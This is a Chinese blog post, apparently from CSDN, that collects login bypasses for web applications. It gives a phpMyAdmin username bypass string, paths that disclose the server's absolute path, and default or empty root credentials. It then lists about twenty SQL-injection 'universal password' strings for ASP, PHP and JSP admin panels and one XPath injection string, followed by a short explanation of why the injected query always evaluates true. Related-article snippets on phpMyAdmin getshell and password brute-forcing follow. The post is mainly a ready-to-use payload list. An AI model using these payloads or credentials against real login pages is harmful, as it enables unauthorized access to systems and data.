php弱口令总结,web漏洞之弱口令

最新推荐文章于 2024-05-11 15:11:58 发布
最新推荐文章于 2024-05-11 15:11:58 发布
阅读量1.4k 收藏 1
点赞数
文章标签: php弱口令总结

前言:将web漏洞中万能密码也归类于弱口令篇。

1.phpmyadmin

phpmyadmin万能密码

其实应该叫phpmyadmin万能账号,因为是在帐号处输入漏洞信息,而密码不需要输入

用户名处写入'localhost'@'@"则登录成功,密码无需输入 (全部为英文标点符号)

c4626749fe0b

phpmyadmin 爆绝对路径

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

漏洞影响版本  2.11.4 , 2.11.3

phpmyadmin弱口令

phpMyAdmin默认账号密码

用户名 root

密码  root

或空登陆。

phpmyadmin root空密码

用户名 root 登陆,无需密码。

漏洞影响版本 2.11.9.2

2.web后台站万能密码admin'or'1'='1

'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1–

"or"a"="a

'xor

'or'='or'

(asp、aspx的万能密码)

1:"or "a"="a

2:')or('a'='a

3:'or'='or'

4:'or 1=1–

5:a'or' 1=1–

6:"or 1=1–

7:'or'a'='a

8:"or"="a'='a

9:'or"='

10:admin'or'1=1

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:'or 1=1%00

15:'xor

'or'='or'

(PHP的万能密码)

or 1=1/*

User:something

Pass:OR 1=1

(jsp的万能密码)

1or1=1

admin OR 1=1/*

xpath注入万能密码

"or 1=1 or "='

万能密码原理:

由于一些网站后台输入账号密码未进行字符过滤导致sql注入万能密码

如下为 登陆源码语句select * from user where username='$user' and password ='$pass'

输入万能密码  'or'1'='1select * from user where username=''or '1'='1' and password ='' or'1'='1'

可以看到 or 直接绕过,使得判断逻辑语句一直为真,对于一些代码可以进行绕过万能密码进入后台,这样SQL返回的值始终为1,就成功绕过了程序的验证。

李昭材
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web应用漏洞.docx
07-05
2. JBoss 4.x-6.x admin-console 口令检测:攻击者可以通过该漏洞执行任意命令。 六、权限提升漏洞 1. Joomla : 3.4.4 - 3.6.3 权限提升漏洞:攻击者可以通过该漏洞提升权限。 2. Joomla! 3.7.0 Core 权限提升...
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 2万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
phpmyadmin口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1269
phpmyadmin口令至getshell 漏洞复现
口令密码正则验证
最新发布
qq_39543482的博客
05-11 128
验证范围及规则:'密码需包含数字、大小写字母、特殊字符,长度8-20,不能出现连续的相同字母或数字、不能出现顺序的字母或数字,不能使用手机号或邮箱作为密码'
web应用常见的其他漏洞总结
2301_79194110的博客
10-08 319
通过扫描器扫描(绿盟,天镜,极光等),7kb扫文件扫目录拼接后面这个/.svn/entries扫描出这个直接在地址后面拼接https://www.xxx.com/.svn/entries 使用seay-svn软件连接,可以查看源代码。1.对用户的数据进行合法性校验,对特殊的字符进行编码,如<、>、’、”、CR、LF等,限制用户输入的 CR 和 LF,或者对 CR 和 LF 字符正确编码后再输出,以防止注入自定义 HTTP 头;右边的“相关软件”的链接,存在一个任意文件下载漏洞
口令与暴力破解
周星星的博客
08-21 2294
口令,暴力破解,Tomcat口令
45.网络安全渗透测试—[穷举篇8]—[phpMyAdmin登录口令穷举]
qwsn
01-12 4092
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、phpMyAdmin登录口令 1、两个工具: 2、示例:
安全运维那些漏洞(目录版)
12-01
Web服务器未及时打补丁,有解析漏洞 PHP-CGI RCE FCK编辑器 server-status信息泄露 网站备份文件放在web目录,可被下载 列目录导致可看到敏感数据并查看 snmp信息泄露 weblogic口令 SVN信息泄露 域传送漏洞 Rsync ...
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
华为Web应用安全开发规范.docx
10-05
6. **DWR(Direct Web Remoting)和RESTful Web Service**:规范还涵盖了DWR和RESTful Web Service的安全规范,要求开发者遵循安全最佳实践,防止远程调用中的安全漏洞。 7. **编程语言安全**:针对C/C++和Java等...
护网面试题总结+DD安全工程师笔试问题
10-14
知识点:Windows 提权可以分为纵向提权和横向提权,常见的提权方法包括系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB 中间件漏洞提权、DLL 劫持提权、滥用高危权限令牌提权、第三方...
phpmyadmin万能密码
kuxing100的专栏
07-25 6520
phpmyadmin 2.11.3 phpmyadmin 2.11.4 利用方式: 直接在phpmyadmin的用户名内填入: ‘localhost’@'@” 不用填入密码,可以直接登录,管理权限哦。
php top100 口令,密码口令TOP100&名字TOP500
weixin_39552768的博客
03-26 1841
以下是在 12306 泄露的密码中,使用次数最多的密码排行,大家在修改密码时候,尽量避免使用类似的规则。密码中包含有 123456 数字的,出现 3236 次密码中包含有 123 数字的,出现 11213 次密码中包含有 520 数字的,出现 4549 次密码中包含有 1314 数字的,出现 3113 次密码中包含有 aini 的,出现 877 次密码 出现次数----------...
记一次phpMyAdmin口令爆破事件应急响应
Boom!脑洞大爆炸的博客
06-27 925
记一次phpMyAdmin口令爆破事件应急响应
phpMyAdmin后台文件包含漏洞(CVE-2018-12613)
weixin_47493074的博客
09-17 519
phpMyAdmin文件包含漏洞复现(CVE-2018-12613)
后台口令问题
m0_62207482的博客
02-05 457
假设在前期的信息搜集过程中我们知道了该后台系统管理员的个人基本信息 (这里采用7.1.1节中的数据),那么,现在只需要让脚本读取7.1.1节生成的社会 工程学密码字典文件,并模拟发送POST数据包,若返回的页面内不包含“Login failed!BLOCK_SIZE的大小分割成许多的账户块和密码块,让每个子线程遍历自己分配 到的账户块和密码块中的数据,模拟POST请求进行破解,若子线程找到了正确的 账户密码,则显示结果并保存到result文件中,然后退出脚本。” 的提示,说明 登录失败。
【精选】口令介绍及破解方式
qq_53058639的博客
11-09 1022
仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。暴力破解,是一种针对于密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。例如一个已知是四位并且全部由数字组成的密码,其可能共有10000种组合,因此最多尝试10000次就能找到正确的密码。而当遇到人为设置密码(非随机密码,人为设置密码有规律可循)的场景,则可以使用密码字典(例如彩虹表)查找高频密码,破解时间大大缩短。
PHPmyadmin漏洞和拿shell
Hacker小梦
04-06 1万+
phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论 phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。 phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用 找这个的话 用自己的写的脚本,或者搜素引擎什么的,这
WEB口令漏洞的危害
06-09
以下是WEB口令漏洞可能带来的危害: 1. 数据泄露:攻击者可以通过获取用户密码,进而访问用户的个人信息、银行账户、信用卡信息、工作文件等,导致用户的个人隐私泄露。 2. 系统崩溃:攻击者通过WEB口令漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值